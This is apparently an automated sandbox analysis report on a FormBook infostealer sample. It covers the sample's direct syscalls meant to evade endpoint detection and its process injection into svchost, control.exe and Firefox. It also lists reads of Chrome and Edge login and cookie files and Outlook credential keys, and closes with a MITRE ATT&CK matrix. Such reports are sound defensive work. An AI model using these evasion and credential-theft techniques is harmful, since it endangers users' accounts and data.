Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031429A0 mov eax, dword ptr fs:[00000030h]	2_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]	2_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031309AD mov eax, dword ptr fs:[00000030h]	2_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031649D0 mov eax, dword ptr fs:[00000030h]	2_2_031649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_031FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031C69C0 mov eax, dword ptr fs:[00000030h]	2_2_031C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]	2_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031629F9 mov eax, dword ptr fs:[00000030h]	2_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_031BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031BC810 mov eax, dword ptr fs:[00000030h]	2_2_031BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov ecx, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03152835 mov eax, dword ptr fs:[00000030h]	2_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0316A830 mov eax, dword ptr fs:[00000030h]	2_2_0316A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]	2_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031D483A mov eax, dword ptr fs:[00000030h]	2_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03160854 mov eax, dword ptr fs:[00000030h]	2_2_03160854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03134859 mov eax, dword ptr fs:[00000030h]	2_2_03134859

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003E80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_003E80A9

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BA124 SetUnhandledExceptionFilter,		0_2_003BA124
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003BA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_003BA155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	NtCreateMutant: Direct from: 0x776735CC	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\control.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\control.exe

Thread register set: target process: 6040

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\control.exe

Thread APC queued: target process: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 25B6008

Jump to behavior

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003E87B1 LogonUserW,

0_2_003E87B1

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_00393B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00393B3A

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_003948D7

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003F4C27 mouse_event,

0_2_003F4C27

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\5by4QM3v89.exe"	Jump to behavior
Source: C:\Program Files (x86)\EOqmYYznCkPBXOkuKBQexWuJHHnItAJyOvVZtYUscseMAPFCQHgskiXkXyMzEgIsFNdKZcKQzODzRs\rVnDkmUdXXPrwb.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_003E7CAF

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_003E874B

Source: 5by4QM3v89.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 5by4QM3v89.exe, rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: EProgram Manager
Source: rVnDkmUdXXPrwb.exe, 00000004.00000002.2624488084.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000004.00000000.1757955572.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000000.1906967625.0000000001011000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003B862B cpuid

0_2_003B862B

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_003C4E87

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003D1E06 GetUserNameW,

0_2_003D1E06

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_003C3F3A

Source: C:\Users\user\Desktop\5by4QM3v89.exe

Code function: 0_2_003949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_003949A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: 5by4QM3v89.exe	Binary or memory string: WIN_81
Source: 5by4QM3v89.exe	Binary or memory string: WIN_XP
Source: 5by4QM3v89.exe	Binary or memory string: WIN_XPe
Source: 5by4QM3v89.exe	Binary or memory string: WIN_VISTA
Source: 5by4QM3v89.exe	Binary or memory string: WIN_7
Source: 5by4QM3v89.exe	Binary or memory string: WIN_8
Source: 5by4QM3v89.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.26a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1841070035.0000000006FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2618010290.0000000002AF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2623602119.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626863347.00000000047B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626768176.0000000004760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838306488.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2626629633.00000000029E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1838875219.00000000034E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00406283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00406283
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_00406747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00406747
Source: C:\Users\user\Desktop\5by4QM3v89.exe	Code function: 0_2_003C7AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset,	0_2_003C7AA1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
